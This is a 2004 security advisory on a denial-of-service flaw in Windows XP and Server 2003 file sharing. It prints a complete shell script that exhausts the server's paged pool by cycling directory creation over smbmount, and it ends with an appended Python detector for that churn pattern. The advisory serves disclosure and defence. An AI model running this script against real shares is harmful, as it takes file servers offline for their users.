Announced: 2004-02-02
Type: Denial of Service Attack on Windows
Impact: smbmount can stop Windows from sharing files
Writer: Daniel Kabs, Germany (daniel.kabs@gmx.de)
Credits: Thanks to Steve Ladjabi (steve.ladjabi@web.de)

Contents:
1. Abstract
2. Affected Systems
3. Attack Setup
4. Symptoms
5. Workaround

1. Abstract

A security vulnerability of "Windows XP" and "Windows 2003 Server" has been found. These systems are open to a denial of service attack. If they share folders to a Unix client that is using smbmount (part of the Samba suite), any user on the client who has permission to create directories on the mounted share can stop the Windows system from serving files. The attack induces a memory shortage on the Windows system by creating directories in a special way.

2. Affected Systems

This denial of service attack has been carried out successfully against

- Microsoft Windows XP Professional, Service Pack 1
- Microsoft Windows Server 2003

Microsoft Windows 2000 Professional and earlier versions of Windows are not affected by this attack.

3. Attack Setup

The attack was carried out successfully using

- "Debian Linux", smbmount 3.0.0beta2
- "Suse Linux 8.2", smbmount version 2.2.2

as Unix clients.

The Windows system shares a folder. The Unix client mounts the share using smbmount. A user on the Unix client has write/create permissions on the shared folder. The user on the client creates and deletes a lot of directories on the mounted share using the following script:

#!/bin/sh
# winblast v3 - DoS on WinXP, Win2003Srv
# 2003-12-04 Steve Ladjabi

count=0
# using 'pathcount' directories
pathcount=1000

echo running \'winblast v3\' with $pathcount files in loop ...
while [ 1 ]; do
    p=$((pathcount*2-1))
    stop=$((pathcount-1))
    while [ "$p" != "$stop" ]; do
        dirname=wbst$p
        # delete old directory if it exists, exit on any error
        if [ -d $dirname ]; then
            rmdir $dirname || exit 3
        fi;
        # generating directory and exit on any error
        mkdir $dirname || exit 1
        p=$((p-1))
        count=$((count+1))
    done;
    echo $count directories generated ...
done;
#-- end --

The script will create 1000 directories and then take turns deleting and re-creating them. There will be no more than those 1000 directories at any time! Every time a directory is created, the Windows system allocates paged pool memory. This memory is not freed although the directory gets deleted. After 3.5 million directories have been created and deleted, the Windows system's paged pool memory has been depleted and it denies access to the share. One tested Windows XP system managed to take 5.8 million directories until it stopped serving. This happens about 4 hours after the attack was started.

4. Symptoms

When the Windows system suddenly fails, it ceases serving, i.e. users can no longer access files or list directory contents from the client. Any client will have lost its access to the share. On the Windows system the event log shows an error with event ID 2020. Additionally, the Administrator of the Windows system can neither unshare the folder nor kill the session due to the lack of memory resources. Trying to open the management console will result in error messages to this effect. Executing the command "net share /delete" fails due to the memory shortage. The only way to get the Windows system working again is to reboot it. Putting more RAM in the machine running Windows will not help as the paged pool memory is limited to 343MB (see MS KB article Q312362).

5. Workaround

The administrator should schedule a daily reboot of the Windows system.
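The point made in section 3, that the share never holds more than 1000 directories while the paged pool leaks away, means a check on the number of directories on the share will never notice the attack; what is abnormal is the rate of create/delete operations from one client, and that signal appears hours before the event ID 2020 error in section 4, by which time the server is already unable to release the share. The following detector is an added example written for this advisory, not code from the advisory, from Samba or from Windows. The audit-log line format (`<ISO timestamp> client=<addr> op=<mkdir|rmdir> path=<path>`), the client addresses, the 60-second window and the threshold of 500 operations are all constructed assumptions; a real deployment would feed it from whatever share-access audit log is available and tune the threshold to the site's normal workload.

```python
"""Rate-based detector for directory create/delete churn on a file share.

Added example (not from the advisory). Log format and sample data are
constructed for the example; lines are assumed to be in time order.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed line format: "<ISO timestamp> client=<addr> op=<op> path=<path>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) op=(?P<op>mkdir|rmdir) path=(?P<path>\S+)$"
)


def parse_line(line):
    """Return (timestamp, client, op, path), or None for a malformed line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["client"], m["op"], m["path"]


def detect_churn(lines, window=timedelta(seconds=60), threshold=500):
    """Flag clients whose mkdir+rmdir count inside one sliding window exceeds
    `threshold`.

    Returns {client: (peak operations in a window, peak live directories)}
    for flagged clients only. The live-directory figure is tracked alongside
    to show that it stays small even while the operation rate is extreme.
    """
    recent = defaultdict(deque)   # client -> timestamps inside the window
    live = defaultdict(set)       # client -> directories currently existing
    peak_ops = defaultdict(int)
    peak_live = defaultdict(int)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                      # skip malformed lines
        ts, client, op, path = parsed
        q = recent[client]
        q.append(ts)
        while q and ts - q[0] > window:   # drop events older than the window
            q.popleft()
        peak_ops[client] = max(peak_ops[client], len(q))
        if op == "mkdir":
            live[client].add(path)
        else:
            live[client].discard(path)
        peak_live[client] = max(peak_live[client], len(live[client]))
    return {c: (peak_ops[c], peak_live[c])
            for c in peak_ops if peak_ops[c] > threshold}


def constructed_log():
    """Build constructed sample lines (not captured from any real system).

    One benign client creates five directories over five minutes. A second
    client keeps only ten directories alive but cycles through them with a
    delete/create pair every 100 ms for one minute, the same bounded-count,
    high-churn pattern as the advisory's script at a much smaller scale.
    """
    t0 = datetime(2004, 2, 2, 10, 0, 0)
    lines = []
    for i in range(5):
        ts = (t0 + timedelta(minutes=i)).isoformat()
        lines.append(f"{ts} client=192.0.2.20 op=mkdir path=/share/proj{i}")
    names = [f"/share/wbst{n}" for n in range(10)]
    present = set()
    for i in range(600):
        path = names[i % 10]
        base = t0 + timedelta(milliseconds=100 * i)
        if path in present:
            lines.append(f"{base.isoformat()} client=192.0.2.10 op=rmdir path={path}")
        ts = (base + timedelta(milliseconds=50)).isoformat()
        lines.append(f"{ts} client=192.0.2.10 op=mkdir path={path}")
        present.add(path)
    return lines


if __name__ == "__main__":
    for client, (ops, dirs) in detect_churn(constructed_log()).items():
        print(f"ALERT {client}: {ops} mkdir/rmdir ops in one window, "
              f"only {dirs} directories alive at peak")
```

On the constructed data the churning client is reported with 1190 operations in one window while never holding more than 10 directories, and the benign client is not reported. Because the Windows-side symptom (event ID 2020, then loss of the share) only appears once the pool is exhausted, a rate alert like this is the point at which an administrator can still close the client's session rather than having to reboot.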